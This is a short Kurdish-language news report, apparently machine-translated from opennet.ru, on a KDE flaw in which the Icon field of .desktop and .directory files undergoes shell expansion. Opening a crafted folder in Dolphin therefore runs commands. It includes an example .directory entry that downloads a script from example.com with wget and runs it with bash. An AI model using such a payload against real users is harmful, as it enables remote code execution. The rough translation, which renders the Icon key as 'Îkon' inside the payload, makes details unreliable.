Di KDE de , ku dihêle êrîşkar fermanên keyfî bi cih bîne dema ku bikarhêner pelrêçek an arşîvek ku pelên ".desktop" û ".directory" yên bi taybetî hatine sêwirandin dibîne dibîne. Ji bo êrîşek pêdivî ye ku bikarhêner bi tenê navnîşek pelan di rêvebirê pelê Dolphin de bibîne, pelek sermaseya xerab dakêşîne, an kurtebirek li ser sermaseyê an belgeyekê bikişîne. Pirsgirêk di serbestberdana heyî ya pirtûkxaneyan de xwe nîşan dide û guhertoyên kevintir, heta KDE 4. Xirab hîna ye (CVE nayê destnîşankirin).
Pirsgirêk ji ber pêkanîna nerast a çîna KDesktopFile, ku dema ku guhêrbara "Icon" hildiweşîne, bêyî ku bi rêkûpêk birevîne, nirxê digihîne fonksiyona KConfigPrivate::expandString(), ku berfirehkirina karakterên taybetî yên şêlê, tevî pêvajoyê, dike. rêzikên "$(..)" wekî fermanên ku têne darve kirin. Berevajî daxwazên taybetmendiya XDG, pêkanîn avahiyên şêlê bêyî veqetandina celebê mîhengan têne hilberandin, ango. ne tenê dema destnîşankirina rêzika fermanê ya serîlêdana ku dê were destpêkirin, lê di heman demê de dema ku îkonên ku ji hêla xwerû ve têne xuyang kirin jî diyar dikin.
Mînak êrîş kirin ji bikarhênerê re arşîvek zip bi pelrêça ku pelek ".directory" tê de heye bişîne mîna:
[Desktop Entry]
Type=Directory
Îkon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Dema ku hûn hewl didin ku naveroka arşîvê di rêvebirê pelê Dolphin de bibînin, dê skrîpt https://example.com/FILENAME.sh were dakêşandin û darvekirin.
Source: opennet.ru